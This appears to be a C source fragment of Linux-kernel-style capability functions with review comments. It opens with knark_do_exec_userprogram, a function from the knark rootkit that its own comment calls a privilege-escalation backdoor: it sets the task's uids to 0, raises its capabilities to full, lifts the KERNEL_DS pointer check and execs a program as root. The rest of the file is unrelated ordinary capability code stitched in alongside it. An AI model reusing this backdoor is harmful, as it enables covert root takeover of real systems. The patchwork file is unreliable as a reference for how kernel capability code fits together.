/*
 * Execute a user program from kernel context as uid 0 with raised capabilities.
 *
 * NOTE(review): the knark_ prefix matches the knark LKM rootkit; read this as a
 * privilege-escalation backdoor rather than a kernel helper - confirm against the
 * surrounding module.  What the visible code does:
 *   - swaps the task's fs_struct for init_task's (init's root and cwd);
 *   - closes every open descriptor, stdin/stdout/stderr included;
 *   - sets the real, effective and fs uid to 0 (suid and the gids are untouched);
 *   - raises the inheritable and effective capability sets to full
 *     (the permitted set is NOT raised here);
 *   - switches the address limit to KERNEL_DS so execve() accepts kernel-space
 *     path/argv/envp pointers, and never restores it.
 *
 * @data  pointer to a struct execve_args (path, argv, envp) for the exec.
 * @return 0 if execve() succeeded, -1 if it failed.  On failure the task keeps
 *         uid 0, the raised capability sets and the KERNEL_DS limit.
 */
int knark_do_exec_userprogram(void *data)
{
	int i;
	struct fs_struct *fs;
	struct execve_args *args = (struct execve_args *) data;

	/* BKL held while the fs_struct is replaced. */
	lock_kernel();
	exit_fs(current);            /* drop our own fs_struct ...            */
	fs = init_task.fs;           /* ... and share init's, bumping its ref */
	current->fs = fs;
	atomic_inc(&fs->count);
	unlock_kernel();

	/* Close every open fd; the new image starts with an empty table.
	 * close() here is presumably a wrapper for the close syscall - verify. */
	for(i = 0; i < current->files->max_fds; i++)
		if(current->files->fd[i])
			close(i);

	/* Become root: real, effective and fs uid.  Saved uid and all gids
	 * are left as they were. */
	current->uid = current->euid = current->fsuid = 0;

	/* Full inheritable + effective caps; cap_permitted is not touched. */
	cap_set_full(current->cap_inheritable);
	cap_set_full(current->cap_effective);

	/* Lift the user/kernel pointer check so execve() will read args->path,
	 * argv and envp from kernel memory.  No matching get_fs()/set_fs()
	 * restore exists on any path. */
	set_fs(KERNEL_DS);
	if(execve(args->path, args->argv, args->envp) < 0)
		return -1;
	return 0;
}
/*
 * Compute the capability sets a binary will be started with.
 *
 * Copied from fs/exec.c:prepare_binprm.  There is no VFS capability
 * support yet, so the executable file itself contributes nothing: the
 * sets only come from the legacy "root means everything" rule below.
 *
 * @bprm  binary being prepared; cap_inheritable/cap_permitted/cap_effective
 *        are written, e_uid is read.
 * @return always 0.
 */
int cap_bprm_set_security(struct linux_binprm *bprm)
{
	int real_root;
	int eff_root;

	/* Start from empty sets. */
	cap_clear(bprm->cap_inheritable);
	cap_clear(bprm->cap_permitted);
	cap_clear(bprm->cap_effective);

	/* Under SECURE_NOROOT uid 0 confers no capabilities at all, so the
	 * cleared sets are final. */
	if (issecure(SECURE_NOROOT))
		return 0;

	/* Compatibility mode: suid-root binaries and root's own children get
	 * the full sets.  A real uid of 0 alone raises only inheritable and
	 * permitted; the effective set is raised only when the image will run
	 * with euid 0. */
	real_root = (current->uid == 0);
	eff_root = (bprm->e_uid == 0);

	if (eff_root || real_root) {
		cap_set_full(bprm->cap_inheritable);
		cap_set_full(bprm->cap_permitted);
	}
	if (eff_root)
		cap_set_full(bprm->cap_effective);

	return 0;
}
/*
 * exec-time hook for the krg_ capability sets.
 *
 * Placeholder: the model cannot be applied at exec time until there is
 * filesystem support for it, so the binprm is left untouched and the hook
 * always reports success.  The #if 0 body records the intended behaviour.
 *
 * @bprm  binary being prepared (currently unused).
 * @return always 0.
 */
int krg_cap_prepare_binprm(struct linux_binprm *bprm)
{
	(void) bprm;
#if 0
	/* Intended once filesystem support exists. */
	cap_clear(bprm->krg_cap_forced);
	cap_set_full(bprm->krg_cap_permitted);
	cap_set_full(bprm->krg_cap_effective);
#endif /* 0 */
	return 0;
}
/*
 * capget hook for the dummy security model: derive a task's capability
 * sets purely from its uids.
 *
 * @target       task being queried (euid and fsuid are read).
 * @effective    out: full initial-effective set if euid == 0, else empty.
 * @inheritable  out: always empty.
 * @permitted    out: full set if euid == 0, else empty.
 * A non-zero fsuid additionally drops the filesystem-related capabilities
 * from permitted and effective.
 * @return always 0.
 */
static int dummy_capget(struct task_struct *target, kernel_cap_t *effective,
			kernel_cap_t *inheritable, kernel_cap_t *permitted)
{
	int root_euid = (target->euid == 0);

	if (!root_euid) {
		cap_clear(*permitted);
		cap_clear(*effective);
	} else {
		cap_set_full(*permitted);
		cap_set_init_eff(*effective);
	}

	/* Nothing is ever inheritable under this model. */
	cap_clear(*inheritable);

	/* The fs-related caps follow fsuid, not euid. */
	if (target->fsuid != 0) {
		*permitted = cap_drop_fs_set(*permitted);
		*effective = cap_drop_fs_set(*effective);
	}

	return 0;
}
/*
 * Raise the current task's effective capability set to everything.
 *
 * Only cap_effective is changed; permitted and inheritable are untouched.
 * The name suggests it runs for the kmod usermode-helper task - check the
 * caller before assuming that.
 */
void cap_task_kmod_set_label(void)
{
	cap_set_full(current->cap_effective);
}